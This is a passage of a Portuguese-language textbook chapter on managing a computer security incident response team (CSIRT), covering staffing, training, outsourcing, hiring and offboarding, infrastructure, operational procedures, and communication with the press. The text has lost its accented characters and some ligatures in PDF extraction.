1 Negociao: atuar com outros integrantes a fm de encontrar um resultado mutua-
mente aceitvel;
1 Resoluo de problemas: trabalhar em equipe para identifcar, defnir e solucionar
problemas, mesmo com restries de tempo e recursos;
1 Assertividade: comunicar valores e opinies de forma clara e confante.
Os melhores profssionais so aqueles que aliam habilidades tcnicas a habilidades
interpessoais, muito embora no exista um conjunto nico de habilidades desejadas
para cada time.
necessrio avaliar a comunidade e a natureza dos servios prestados, a fm de identifcar
as habilidades necessrias. Alguns times optam por profssionais especialistas, outros,
porm, optam por profssionais generalistas.
Dependendo do
tamanho da equipe,
pode-se organizar o
grupo por reas, onde
um responsvel com
bom nvel tcnico pode
orientar os menos
experientes. Adicional-
mente, as habilidades
tcnicas podem ser
aprimoradas atravs
de cursos e treina-
mentos, fazendo
com que integrantes
da equipe ganhem
novas habilidades.
l
24

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Treinamento e desenvolvimento da equipe
O treinamento dos profssionais do CSIRT tem como objetivo manter a equipe preparada
para atuar no processo de resposta. Dessa forma, os integrantes do grupo podem apri-
morar suas habilidades e adquirir novas aptides, de modo a prestar servios de forma mais
efetiva para a comunidade de atuao.
q Afnal, uma equipe com conhecimento das novas tecnologias e tendncias de segurana pode
identifcar mais rapidamente as caractersticas de incidentes at ento no identifcadas.
O processo de desenvolvimento das habilidades da equipe deve comear com uma ava-
liao prvia das habilidades existentes no time e habilidades demandadas. Esse processo
deve avaliar cada membro da equipe de forma individual e priorizar demandas mais crticas
para o grupo. Como resultado, pode-se efetuar um treinamento com foco no indivduo
ou, ainda, endereado s limitaes da equipe como um todo, tal como anlise de riscos e
comunicao em ingls.
q Procedimentos que podem ser implementados para o desenvolvimento da equipe:
1 Estudo de procedimentos internos: ler e atualizar os procedimentos internos utili-
zados pelo CSIRT uma forma de aprimorar habilidades individuais, sobretudo para
os novos membros da equipe. Sabe-se que os procedimentos usados na resposta a
incidentes so dinmicos e necessitam de constantes atualizaes. Logo, a constante
reviso dos procedimentos internos benfca para o time que mantm o material
atualizado e tambm para os integrantes, que revisitam os procedimentos utilizados
nos incidentes passados;
1 Programa de tutoria: a fgura de um tutor utilizada na maioria dos CSIRTs no
treinamento de novos membros. Para isso, designado um profssional da equipe
com mais experincia para auxiliar um novo integrante. O processo de tutoria deve
ser contnuo, at o tutor assegurar-se de que o novo integrante tenha profcincia e
consiga lidar, sem cometer erros custosos, com as tarefas demandadas;
1 Estudo individual: alguns CSIRTs consideram disponibilizar horrio de trabalho para
que o profssional estude temas especfcos tal como anlise forense para serem
aplicados no processo de tratamento de incidentes. Para isso, a instituio deve
prover o material tcnico necessrio, tal como peridicos, revistas e livros;
1 Treinamento externo: alguns CSIRTs optam por treinar e desenvolver a equipe
usando instituies externas com boa reputao no mercado. Muitas vezes, trata-se
de uma questo pontual, onde novas habilidades precisam ser incorporadas equipe
em um curto espao de tempo.
Terceirizao de servios
Muitas vezes, a difculdade de encontrar profssionais da rea e estabelecer uma equipe
de segurana acompanhando as mudanas da indstria tem fomentado a contratao de
servios externos, ou seja, a terceirizao de servios relacionados segurana.
Cada instituio deve tomar as decises que julgar mais convenientes em relao tercei-
rizao de servios relacionados ao tratamento de incidentes de segurana. Alguns CSIRTs
optam, por exemplo, em terceirizar etapas nas quais a equipe no tem expertise, tal como
anlise de malware. Por outro lado, outros times optam por terceirizar o CSIRT como um
todo, atribuindo a gerncia de incidentes de segurana para uma entidade externa. Alguns
cenrios onde esse modelo comumente utilizado so em bancos e outras instituies
25

C
a
p

t
u
l
o


2

-

G
e
r
e
n
c
i
a
m
e
n
t
o

d
o

C
S
I
R
T
fnanceiras. Isso se deve, basicamente, ao grande volume de incidentes e os custos para
manter um corpo tcnico especializado na instituio.
Antes de decidir pela terceirizao de servios, fundamental avaliar as vantagens e desvan-
tagens de cada modelo.
q Nesse contexto, alguns fatores devem ser considerados, tais como:
1 Custos e riscos associados;
1 Dependncia tecnolgica;
1 Qualidade do servio prestado;
1 Questes legais;
1 Questes operacionais;
1 Segurana das informaes;
1 Representatividade.
A terceirizao pode oferecer signifcativa reduo dos custos enquanto estiver provendo
servios similares com economia de recursos humanos e de infraestrutura. Alm disso,
empresas terceirizadas geralmente defnem um Service Level Agreement (SLA) no qual
pode ser estipulado o tempo de atendimento e demais mtricas-chave que podem manter
a sua instituio segura com relao aos requisitos de qualidade. Adicionalmente, possvel
acompanhar as atividades do servio contratado por meio de relatrios e, at mesmo, em
tempo real, tendo acesso ao sistema utilizado.
q Por outro lado, a terceirizao de servios implica em disponibilizar informaes sensveis
a terceiros.
Essas informaes podem ser estratgias para segurana da instituio e tambm sob o ponto
de vista competitivo. Portanto, faz-se necessrio avaliar, em mbito operacional e gerencial, os
riscos inerentes terceirizao de servios. importante lembrar que a instituio que con-
trata os servios continua sendo responsvel por eventos de segurana perante a lei.
Para pensar
O armazenamento de arquivos na nuvem pode ser considerado terceirizao
de recursos?
Contratao
A contratao sempre um processo delicado, sobretudo para um CSIRT onde informaes
sensveis instituio so manejadas. Para isso, faz-se necessrio que o time de segurana
tenha um processo com etapas bem defnidas para contratao de novos integrantes.
O processo de contratao uma atividade que envolve outros departamentos da instituio.
O departamento de recursos humanos e o departamento jurdico, por exemplo, so setores
com os quais o CSIRT vai interagir na maioria das etapas do processo de contratao.
q J no processo de seleo, outros departamentos podem ser envolvidos. Evidentemente,
cada instituio tem os seus prprios procedimentos internos de seleo que consi-
deram a prpria cultura da instituio; no entanto, existem algumas etapas que devem
ser consideradas, tal como:
1 Anlise curricular;
26

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Entrevista pessoal;
1 Questes contratuais;
1 Questes ticas.
Dependendo da natureza da organizao e da natureza das funes a serem desempe-
nhadas, outros cuidados podem ser demandados. Isso inclui a aprovao especfca das
altas hierarquias da instituio e, at mesmo, a verifcao de antecedentes criminais.
As etapas do processo de seleo devem ser aptas a identifcar os pontos fortes dos candi-
datos, bem como as limitaes do profssional. Com isso, a equipe pode avaliar se as limita-
es do candidato podem ser endereadas atravs de treinamento e, por fm, identifcar se
o candidato est apto a realizar as funes demandadas.
Uma entrevista pessoal com o candidato sempre recomendada. O ideal que essa
entrevista seja realizada com a presena de membros da equipe do CSIRT. Dessa forma,
questes tcnicas podem ser esclarecidas e habilidades interpessoais, avaliadas. Na entre-
vista tambm devemos deixar claro as responsabilidades e benefcios demandados para a
equipe. Dessa forma, ambas as partes podem ajustar as suas expectativas.
q Algumas questes que merecem ser esclarecidas:
1 Atividades a serem desenvolvidas;
1 Plano de carreira;
1 Carga horria;
1 Possibilidade de viagens.
Alm de questes tpicas relativas ao horrio de trabalho e atividade a ser desenvolvida, a
entrevista de seleo tambm deve tratar aspectos operacionais, tal como horas extras, tra-
balho em regime de sobreaviso e necessidade de viagens. Com isso, o candidato e o CSIRT
podem avaliar a adequao do perfl em funo ao cargo.
Aps a contratao, entra em ao um conjunto de tarefas que visam integrar o funcionrio
equipe e inseri-lo na cultura institucional. Por fm, tambm parte do processo de contra-
tao treinar o funcionrio com procedimentos internos e rotinas da equipe.
Do ponto de vista administrativo, o CSIRT deve manter a equipe motivada e com recursos
que permitam a evoluo tcnica e interpessoal dos integrantes do time.
q Algumas formas de aprimorar e assegurar a evoluo dos integrantes da equipe compreende:
1 Garantir fnanciamento no plano de trabalho anual para treinamento de todos os
membros da equipe, incluindo equipe tcnica e equipe gerencial;
1 Ter acesso a livros e artigos relevantes para a rea de tratamento de incidentes, per-
mitindo que os membros do time expandam suas habilidades;
1 Assegurar que membros da equipe com pouca experincia sejam acompanhados de perto
por membros mais experientes, fazendo com que o esforo de aprendizado seja efetivo;
1 Participar de eventos com outros CSIRTs, pois uma boa maneira de trocar expe-
rincias prticas;
1 Encorajar membros da equipe a realizar cursos (ps-graduao, mestrado ou douto-
rado) em reas relativas ao processo de incidentes, tais como criptografa, segurana
da informao, Sistemas Operacionais e redes de computadores.
27

C
a
p

t
u
l
o


2

-

G
e
r
e
n
c
i
a
m
e
n
t
o

d
o

C
S
I
R
T
Para pensar
Voc contrataria estagirios ou bolsistas para atuar na resposta a incidentes?
Procedimentos de ingresso e desligamento
A formao de um time de resposta a incidentes no o nico desafo associado resposta
a incidentes. Com o passar do tempo, a equipe evolui tecnicamente e novos conhecimentos
so incorporados ao CSIRT. Alguns membros do time passam para cargos gerenciais e novos
ocupam as lacunas existentes na equipe. Adicionado a isso, comum que membros da
equipe se desliguem ou ainda sejam desligados do CSIRT.
Nesse contexto, um CSIRT deve estar preparado para lidar com a rotatividade e com a perda
de pessoas-chave na instituio.
q Uma forma de lidar com a rotatividade da mo de obra implementar uma poltica de
rotatividade de atividades na prpria equipe. Assim, evita-se que uma nica pessoa
possua todo o conhecimento de uma determinada atividade ou processo.
Por exemplo, por um perodo determinado o funcionrio responsvel por tratar incidentes
de segurana troca de posto com o funcionrio responsvel pelas ferramentas de monito-
rao. Desse modo, o conhecimento das atividades do CSIRT passa a ser homogeneizado
entre os integrantes da equipe.
Devido natureza sensvel das informaes que passam por um CSIRT, torna-se necessrio
que procedimentos especiais sejam adotados no ingresso e no desligamento de um profs-
sional. Tipicamente os novos integrantes assinam contratos de confdencialidade especfcos
do CSIRT e demais acordos da instituio relativos propriedade intelectual. Por outro
lado, quando um integrante do CSIRT deixa de fazer parte do time, outros procedimentos
devem entrar em ao. Um procedimento de desligamento de funcionrios de um CSIRT
deve especifcar tarefas tcnicas e administrativas que assegurem a segurana dos sistemas
do CSIRTs. Afnal, o ex-funcionrio tende a levar consigo todo o conhecimento adquirido
durante a sua estada no time, incluindo sistemas utilizados, senhas dos servidores e proce-
dimentos utilizados.
Sendo assim, aconselha-se que um roteiro de desligamento de funcionrio seja criado. Um
bom procedimento de desligamento deve conter uma interao com outros departamentos
da instituio, tal como administrador de sistemas e administradores de bases de dados.
q As tarefas relativas ao desligamento deve considerar as seguintes questes:
1 Credenciais de acesso:
2 Fsico (portas, salas e datacenter);
2 Remoto (VPN);
2 Sistemas (contas de usurio em mquinas e servidores).
1 Dados de usurios (incluindo backup);
1 E-mail institucional.
O endereo de e-mail institucional, em especial, pode ter procedimentos diferentes para a
remoo. Alguns times optam por remover a conta subitamente, mas outros preferem
28

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
confgurar uma mensagem automtica informando o desligamento do funcionrio.
q Tal procedimento pode evitar possveis ataques de engenharia social:
PAULO DA SILVA no faz mais parte da equjipe do CSIRT. Por favor, direcione os seus
e-mails para o e-mail do grupo, csirt@csirt.
Por fm, essencial que a equipe atente para os processos de ingresso de novos integrantes
e procedimentos de sada de um funcionrio da equipe. Acabamos de descrever os principais
fatores para auxiliar o CSIRT a defnir seus procedimentos. Sabe-se, no entanto, que existem
muitos outros fatores que no foram abordados. Por exemplo, considere a situao a seguir:
Um ex-funcionrio conseguiria ter acesso ao sistema de documentao interno (website) do
CSIRT acessando a rede de visitantes da instituio?
Logo, o procedimento de desligamento de funcionrios pode no ser complexo, mas deve
prever mecanismos de modo a evitar a situao do exemplo.
Requisitos estruturais
q Os requisitos estruturais de um CSIRT constituem uma infraestrutura bsica necessria
para a efetiva conduo de um CSIRT. Essa infraestrutura deve considerar os servios
prestados e tambm o tamanho da comunidade a ser atendida. Alguns elementos estru-
turais que devem ser considerados:
1 Equipamento;
1 Software;
1 Espao fsico;
1 Legislao especfca.
Evidentemente, a defnio da infraestrutura operacional est sempre limitada pela dispo-
nibilidade de oramento. Nem sempre a estrutura ideal pode ser implementada no incio
do estabelecimento de um CSIRT. Mesmo assim, importante defnir recursos estruturais
mnimos para que o time possa prover os servios para a sua comunidade. Por exemplo,
alguns softwares facilitariam a execuo de tarefas relacionadas com anlise de dispositivos
mveis; no entanto, o custo da licena pode pesar no oramento inicial do CSIRT.
Outra questo fundamental na fase de especifcao de recursos para a operao de um
CSIRT ter clara a natureza das atividades prestadas pela instituio. Algumas reas espe-
cfcas de atuao exigem normas de infraestrutura a serem seguidas pelo CSIRT. Nesses
casos, uma legislao especfca deve ser seguida. Isso muito comum para CSIRTs do setor
fnanceiro. Tais CSIRTs devem seguir uma normalizao especfca que inclui a utilizao de
softwares especfcos e auditoria de processos.
De fato, todos os CSIRTs possuem requisitos bsicos para operar com segurana. Um dos
principais requisitos em relao infraestrutura operacional. Recomenda-se que a infra-
estrutura do CSIRT seja separada fsicamente e logicamente dos demais elementos da ins-
tituio. Sabe-se que a equipe de um CSIRT est constantemente lidando com informaes
sensveis e atuando com incidentes de segurana que devem ser tratados prontamente.
A separao fsica, por exemplo, aborda questes relativas ao local de trabalho e tambm ao
seu acesso fsico. O ideal que um CSIRT deve possuir uma sala dedicada para sua ope-
rao com os devidos controles de acesso. Desse modo, as informaes sensveis evitam ser
expostas a pessoas de outros setores da instituio. Nem sempre a separao fsica pode ser
efetivada, mesmo assim, importante que o CSIRT implemente medidas para evitar o acesso
29

C
a
p

t
u
l
o


2

-

G
e
r
e
n
c
i
a
m
e
n
t
o

d
o

C
S
I
R
T
s suas reas de trabalho, incluindo: fltro de privacidade, utilizao de bloqueio de tela, orien-
tao do monitor no sentido contrrio a do fuxo de pessoas e de cmeras de vigilncia.
De forma complementar, fundamental que o CSIRT implemente tambm a separao
lgica para os seus recursos. Por exemplo, usando um seguimento prprio de rede
(sub-rede) e servidores dedicados para as suas atividades. A topologia de rede, em especial,
deve considerar questes de redundncia e conectividade. Uma queda de energia pode ser
to prejudicial quanto um ataque de negao de servio.
q Adicionalmente, a infraestrutura de um CSIRT deve ser resiliente de modo a suportar e
conter ataques. Um CSIRT um potencial alvo de ataques.
Logo, desejvel que, se isso vier a ocorrer, no cause qualquer prejuzo nas atividades
operacionais normais. Cabe equipe possuir recursos de segurana para proteger os seus
sistemas e monitorar possveis aes maliciosas destinadas sua infraestrutura.
q De forma resumida, os requisitos estruturais devem contemplar:
1 Controles apropriados de defesa e controle para sistemas, redes, dispositivos, aplica-
es, bases de dados e outros;
1 Um conjunto de procedimentos para o tratamento de incidentes e documento distri-
budo entre a equipe;
1 Tarefas designadas para cada membro da equipe e papis defnidos nos processos de
resposta a incidentes.
Procedimentos operacionais
q Os procedimentos operacionais referem-se a um conjunto de atividades que tm por
objetivo guiar a equipe, fazendo com que aes apropriadas para a resoluo de um
incidente sejam tomadas.
Para isso, so especifcadas responsabilidades das partes envolvidas e as respectivas aes
que devem ser desempenhadas pelos membros do time.
Tipicamente, um CSIRT possui um conjunto de procedimentos operacionais para os prin-
cipais tipos de incidentes tratados pelo time, incluindo: comprometimentos de servidores,
infeco por vrus, negao de servio e notifcao de vulnerabilidades. Um bom procedi-
mento descreve em linhas gerais como determinados incidentes devem ser tratados, no
se atendo a tecnologia ou ferramentas a serem utilizadas. Dessa maneira, o profssional
pode seguir as etapas do procedimento e ter fexibilidade para escolher a tecnologia a ser
utilizada. Em boa parte dos casos, os procedimentos operacionais permitem eventuais
adaptaes nas aes a serem realizadas; no entanto, recomenda-se que adaptaes sejam
minimizadas durante o processo. Quando necessrio efetuar adaptaes no processo,
essencial que as aes adicionais sejam documentadas.
Peculiaridades da instituio devem ser observadas na composio de procedimentos ope-
racionais, logo o conjunto de rotinas de cada CSIRT tende a ser nico.
q Mesmo assim, existem pontos comuns que devem ser endereados para o efetivo
desenvolvimento de procedimentos operacionais:
1 Descrio sucinta do procedimento;
1 Classifcao do incidente;
1 Situaes em que o procedimento operacional deve ser aplicado;
1 A quem se destina o procedimento;
30

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Quais so os recursos crticos;
1 Etapas prioritrias;
1 Aes a serem realizadas;
1 Como as informaes devem ser documentadas;
1 Quem pode contatar entidades externas;
1 Classifcao da informao (pblica, privada ou restrita);
1 Como o procedimento deve ser distribudo.
A ttulo de ilustrao, na sequncia apresentado um fragmento de um procedimento
operacional para coletar informaes de sistemas comprometidos.
Como referncia, o procedimento foi implementado tendo como base as proposies des-
critas pelos autores do livro Malware Forensics: Investigating and Analyzing Malicious Code, da
editora Elsevir.
Procedimento para coleta de informaes em sistemas ativos
Em alguns incidentes especfcos, necessrio investigar uma mquina comprometida
mantendo o sistema em execuo. Recomenda-se, nesses casos, coletar evidncias de um
sistema comprometido comeando pelos dados mais volteis, ou seja, dados que podem ser
perdidos mais facilmente.
Inicialmente, importante lembrar que um sistema comprometido no confvel. Devem-se
executar os comandos de investigao a partir de um sistema confvel, tal como um live CD
previamente preparado. Aps essa observao, as seguintes etapas podem ser utilizadas no
procedimento de coleta de informaes de sistemas ativos:
1. Documentar data e hora do sistema comprometido e comparar com uma fonte confvel.
2. Obter o contedo da memria do sistema utilizado.
3. Obter detalhes do sistema (verso do Sistema Operacional, usurios, nome do computador
na rede).
4. Analisar o status do sistema e detalhes do ambiente de execuo (modo administrativo,
formas de acesso).
5. Identifcar usurios logados no sistema.
6. Inspecionar as conexes de rede e portas abertas.
7. Examinar consultas DNS realizadas pela mquina comprometida.
8. Analisar os programas em execuo.
9. Correlacionar os programas em execuo e as portas abertas.
10. Inspecionar os arquivos abertos.
11. Examinar o histrico dos comandos digitados na linha de comando.
12. Verifcar por contas no autorizadas no sistema, grupos e compartilhamento.
13. Determinar tarefas agendadas no sistema.
14. Coletar o contedo da rea de transferncia.
Todo procedimento deve ser previamente testado pela equipe. Os membros da equipe no
podem ter dvidas relativas s etapas a serem desempenhadas, tampouco sobre a maneira
com que estas devem ser implementadas.
importante notar que os procedimentos no so imutveis. Cada incidente tratado
utilizando o respectivo procedimento uma oportunidade para revisar a efetividade do
processo. Cabe ao time avaliar as diferentes etapas e identifcar a sua efcincia. E, caso seja
necessrio, seguir a rotina que especifca como os procedimentos devem ser atualizados.
Uma boa forma de
testar os procedi-
mentos revisar o
histrico de incidentes
da instituio e verifcar
se as etapas defnidas
sero efetivas em boa
parte dos casos.
l
31

C
a
p

t
u
l
o


2

-

G
e
r
e
n
c
i
a
m
e
n
t
o

d
o

C
S
I
R
T
Comunicao
q A comunicao diz respeito a todas as aes onde um CSIRT interage com outras
entidades. Isso engloba comunicao efetuada de forma verbal ou escrita. De fato,
a comunicao com outras entidades uma atividade muito frequente nas atividades
dirias de um CSIRT.
Afnal, sabe-se que o processo de resposta a incidentes uma tarefa coletiva onde a comuni-
cao com diferentes entidades demandada para a resoluo de incidentes de segurana.
A comunicao pode ser efetuada utilizando diferentes meios, tal como: envio de e-mails;
telefonemas, entrevistas, palestras e cursos. Sendo assim, cabe ao CSIRT conhecer os
fundamentos de uma boa comunicao para aprimorar o fator de sucesso no processo de
resposta a incidentes.
No contexto de um CSIRT, o primeiro ponto a ser salientado so os diferentes nveis de
detalhamento que devem ser utilizados durante uma comunicao. Evidentemente que isso
est atrelado ao cdigo de conduta do prprio CSIRT. Mesmo assim, devem ser tomados
cuidados especiais ao comunicar-se com as diferentes partes envolvidas no processo de
resposta a incidente. Uma das principais difculdades est em interagir com pessoas com
diferentes nveis de conhecimento tcnico.
Tipicamente, ao notifcar um incidente, envia-se uma notifcao para o responsvel pelo
sistema afetado. Muitas vezes, no entanto, o responsvel pelo sistema no possui conheci-
mentos tcnicos para auxiliar na resoluo do problema. Em outros casos, porm, o respon-
svel no pode ser claramente defnido.
q Nesses casos, para que a comunicao do incidente seja efetiva e compreendida,
necessrio considerar alguns aspectos bsicos, tais como:
1 Contextualizao do problema a ser reportado;
1 Ausncia de jarges;
1 Uso de sentenas claras;
1 Informaes sintetizadas.
importante descrever e sempre contextualizar como comunicao relativa notifcao de
segurana. Dessa maneira, o destinatrio pode entender ou relembrar o caso a ser tratado.
Da mesma forma, importante lembrar que muitas notifcaes so enviadas para e-mails
institucionais, o que pode resultar em diferentes pessoas tratando, ou continuando, o inci-
dente de segurana.
Adicionalmente, evitar o uso de jarges e siglas evita possveis mal-entendidos. Termos
tcnicos, siglas e abreviaes podem ter diferentes signifcados, dependendo do contexto
utilizado. Por exemplo, o protocolo Border Gateway Protocol (BGP) facilmente interpretado
por administradores de sistemas; no entanto, em outros contextos, a sigla BGP pode repre-
sentar Batalho da Guarda Presidencial.
Muitas vezes a resoluo de um incidente depende da boa vontade de um administrador de
rede. Por isso, fundamental que a comunicao atenha-se a questes fundamentais para
a investigao do incidente. Em alguns casos, uma solicitao de ajuda polida e descrita de
forma direta mais efetiva que uma notifcao extrajudicial.
32

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Deve-se evitar o uso de frases que possam parecer ofensivas para outros usurios e, at mesmo,
observar fatores culturais para evitar um possvel insulto para a sua audincia. Por exemplo,
notifcar a hospedagem de um contedo sexual pode gerar possveis constrangimentos.
Por fm, importante lembrar que a forma com que o CSRIT comunica-se vai defnir como
este ser visto externamente, deixando impresses do trabalho realizado.
Polidez e profssionalismo na comunicao so qualidades que devem ser buscadas
em todos os processos de resposta a incidentes, sobretudo, na interao com
outras entidades.
Como lidar com a imprensa
Muitas vezes um CSIRT necessita lidar com a imprensa para a divulgao de procedimentos
e esclarecimentos relacionados aos eventos de segurana. A efetiva comunicao com a
impressa mais uma forma de comunicar-se com a comunidade de atuao e, em ltima
anlise, pode ser determinante para o estabelecimento de um CSIRT na comunidade.
Cada instituio tem sua prpria poltica de relacionamento com a imprensa. Algumas
instituies possuem departamentos prprios para atuar com a comunicao externa.
J outras instituies optam por desenvolver polticas e procedimentos internos para
lidar com a imprensa.
Independentemente do modelo utilizado para o relacionamento com a imprensa, todos os
membros da equipe devem saber como posicionar-se frente s mdias pblicas. Os membros
da equipe devem estar cientes que representam o CSIRT, onde opinies pessoais podem
ser erroneamente interpretadas como posicionamento da equipe. A posio de um CSIRT
s pode ser considerada quando fruto de consenso e compartilhada entre todos os
membros da equipe.
q As seguintes questes devem estar defnidas em uma boa poltica de relacionamento
com a imprensa:
1 Quem do CSIRT possui autorizao para entrevistas?
1 Qual o meio pelo qual a comunicao pode ser realizada?
2 Comunicados impressos;
2 Entrevistas gravadas;
2 Entrevistas ao vivo.
1 Que informaes o CSIRT pode divulgar?
1 A equipe divulga informaes no decorrer de uma investigao?
Sabe-se que os CSIRTs so constantemente sondados por jornalistas quando grandes casos
ganham a mdia nos grandes jornais, tal como assuntos relacionados a espionagem, ciberguerra,
vazamento de informaes e vulnerabilidade de sistemas. Em casos onde as informaes
demandadas pela imprensa esto diretamente relacionadas com incidentes sendo investigados,
necessrio que os cuidados na comunicao sejam redobrados.
q O CSIRT deve atentar para:
1 No divulgar informaes confdenciais;
1 No divulgar informaes sobre investigaes em andamento;
1 No apontar culpados ou responsveis;
33

C
a
p

t
u
l
o


2

-

G
e
r
e
n
c
i
a
m
e
n
t
o

d
o

C
S
I
R
T
q 1 No relacionar parceiros, terceiros ou concorrentes sem prvio consentimento;
1 Evitar comparaes sem embasamento e sem prvio consentimento.
Declaraes errneas e ms interpretaes podem pr em cheque a segurana da prpria
instituio e, em ltimos casos, afetar a imagem pblica de uma instituio. Por exemplo,
uma indisponibilidade temporria no servidor causado por um negao de servios pode
ser interpretada como comprometimento da infraestrutura ou, ainda, que usurios do
sistema tiveram seus dados expostos.
q Algumas recomendaes que a equipe pode usar para o posicionamento frente
imprensa:
1 Identifcar os aspectos-chave da sua comunicao;
1 Antecipar questes difceis formulando respostas prvias;
1 Utilizar sentenas curtas;
1 Explicar de forma simplifcada questes tcnicas;
1 Utilizar frases positivas ao invs de negativas;
1 Ser diplomtico e sempre falar a verdade;
1 Utilizar vestimenta adequada.
Por fm, o entrevistado tem o direito de terminar a entrevista a qualquer momento
quando seus direitos no forem respeitados.
Fatores de sucesso
q Fatores de sucesso descrevem aspectos que devem ser observados para que um CSIRT
tenha os seus objetivos propostos alcanados.
Evidentemente no existe um conjunto de regras que determinem o sucesso de um CSIRT.
Cabe a cada time constantemente avaliar os seus recursos e especifcar mtricas de ava-
liao de desempenho do time como um todo.
Sem dvida, a qualidade dos servios prestados determinante para a competncia e
efcincia da equipe.
Figura 2.1
Como cada um
entende
Hackers derrubaram por
pouco tempo o website
da CIA ontem.
O que as pessoas ouvem:
Algum invadiu os
computadores da CIA
O que os especialistas em
computao ouvem:
Algum derrubou um cartaz
pendurado pela CIA
34

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q No entanto, existem outros fatores igualmente importantes para auxiliar na longevidade
do CSIRT e no estabelecimento do CSIRT na sua comunidade de atuao, tal como:
1 Contar com o apoio organizacional;
1 Ter papel caracterizado na poltica de segurana da instituio;
1 Defnir a autoridade que possui o CSIRT;
1 Divulgar o CSIRT para seu pblico-alvo;
1 Obter formas de fnanciamento adequadas e duradouras.
So observados os maiores desafios operacionais nos estgios iniciais da operao. Uma das
principais barreiras para o sucesso de um CSIRT o seu reconhecimento pela sua prpria
comunidade. Nesse contexto, o apoio organizacional torna-se importante, pois evita que o CSIRT
seja visto como mais um departamento na instituio ou, ainda, um departamento com funes
sobrepostas aos demais departamentos, tal como o departamento de tecnologia de informao.
A aceitao de um time tambm depende de sua efcincia. importante que o CSIRT tenha
a habilidade de coordenar a resposta a incidentes atuando de forma profssional e com a
expertise necessria para a resoluo do caso. Com uma atuao transparente, descre-
vendo as aes tomadas e o status das atividades, o CSIRT tende a fortalecer a confana dos
usurios na equipe.
Alm do estabelecimento do CSIRT na estrutura organizacional da instituio, necessrio
assegurar recursos para manter o time funcionando de forma permanente. Questes como
verbas, fundos de fnanciamento e alocao de recursos so igualmente importantes para o
sucesso de um CSIRT. Sendo assim, cabe ao time pleitear junto sua instituio os recursos
fnanceiros necessrios para manter a sua operao.
q Ao avaliar questes relativas a fontes de fnanciamento, deve-se considerar:
1 Assegurar recursos fnanceiros de forma regular e permanente;
1 Identifcar fontes de fnanciamento alternativas;
1 Estimar o custo operacional do CSIRT constantemente.
Tipicamente, os CSIRTs devidamente inseridos na estrutura organizacional possuem uma
verba j alocada para a sua operao, no tendo problemas com a falta de recursos, muito
embora isso nem sempre seja uma realidade.
A falta de fnanciamento um problema encontrado por algumas equipes. Uma organizao
pode fornecer recursos para o estabelecimento de uma equipe competente, com equipamentos
necessrios, e o devido treinamento. Entretanto, no primeiro percalo, o fnanciamento para a
segurana um dos primeiros a serem cortados.
Profssionais de segurana sabem da difculdade de justifcar o fnanciamento de um CSIRT.
A segurana no produz lucros para a instituio em curto prazo, mas sim em mdio e longo
prazo. O CSIRT atua na preveno e soluo de incidentes de segurana, o que resulta, em
ltima anlise, na diminuio de possveis custos.
Sabe-se que o sucesso da equipe pode trabalhar contra a prpria equipe. A reduo dos inci-
dentes causados pelo bom trabalho do grupo pode passar a sensao de que a equipe desne-
cessria. Logo, aconselha-se documentar todas as atividades e elaborar resumos executivos
das aes desempenhadas pelos CSIRTs para que estes sejam apresentados aos gestores.
35

C
a
p

t
u
l
o


2

-

G
e
r
e
n
c
i
a
m
e
n
t
o

d
o

C
S
I
R
T
Por outro lado, a falta da observncia dos fatores descritos corrobora com o insucesso do
CSIRT. A falta de apoio institucional e a inexistncia de recursos adequados para manter o
time constituem os principais fatores de fracasso de uma equipe.
q A falta de planejamento e a realizao de aes inadequadas tendem a minar a confana
no grupo, causando:
1 Falta de apoio da organizao;
1 Ausncia de autoridade para iniciar o processo de segurana;
1 Despreparo para responder a eventos.
fundamental que o CSIRT entenda a atividade comercial da instituio e como o time
enquadra-se no contexto.
Em instituies comerciais, manter o funcionamento de atividades que geram receita
financeira tem prioridade. um fato. At mesmo em empresas no comerciais, a
continuidade dos negcios tem a primazia. Um time de resposta a incidentes deve observar
tais premissas e evitar ao mximo que a instituio deixe de realizar sua atividade comercial.
De certa forma, o CSIRT prov apoio para as atividades comerciais da instituio.
Um erro comum cometido pelos CSIRTs focar a resoluo de incidentes apenas em aspectos
tcnicos, sem avaliar a situao da instituio como um todo. Os membros da equipe devem
saber o que impactado quando um determinado recurso comprometido. Por exemplo,
em um comprometimento de um servidor web, deve-se primeiramente identifcar quais
atividades so impactadas e, s depois, identifcar como o servidor foi comprometido e que
tcnicas e ferramentas foram utilizadas.
q Considere a seguinte situao:
1 O seu nico servidor de e-commerce foi comprometido. Observa-se um padro
atpico na matriz de trfego do servidor em pleno horrio de expediente da empresa.
Para pensar
Business comes frst (Primeiro os negcios).
q Desligar o servidor imediatamente para investigao seria a melhor opo na perspec-
tiva de resposta a incidentes; no entanto, no ponto de vista de continuidade de negcios,
talvez no seja a melhor opo. O desligamento do servidor durante o horrio de expe-
diente poderia causar perdas maiores para a continuidade das atividades crticas que
manter a organizao funcionando. Uma soluo intermediria poderia ser agendar uma
manuteno programada para a investigao do servidor em um horrio com menos
acessos aos servios do servidor. A resposta de incidentes pode ser formulada de forma
mais efetiva apenas analisando as consequncias para a instituio.
Por fm, o sucesso de um CSIRT depende da instituio como um todo. Alm de realizar um bom
trabalho, deve-se atentar para questes polticas e continuidade dos negcios de uma instituio.
36

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Leitura recomendada:
1 Creating an Incident Response Team:
http://www.educause.edu/ir/library/pdf/SEC0302.pdf
1 NIST SP 800-3: Establishing a Computer Security Incident Response Capability (CSIRC):
http://www.terena.nl/activities/tf-csirt/archive/800-3.pdf
1 RFC 2.350: Expectations for Computer Security Incident Response
http://www.ietf.org/rfc/rfc2350.txt
1 CERT/CC CSIRT Services:
http://www.cert.org/archive/pdf/CSIRT-services-list.pdf
1 Handbook for Computer Security Incident Response Teams (CSIRTs):
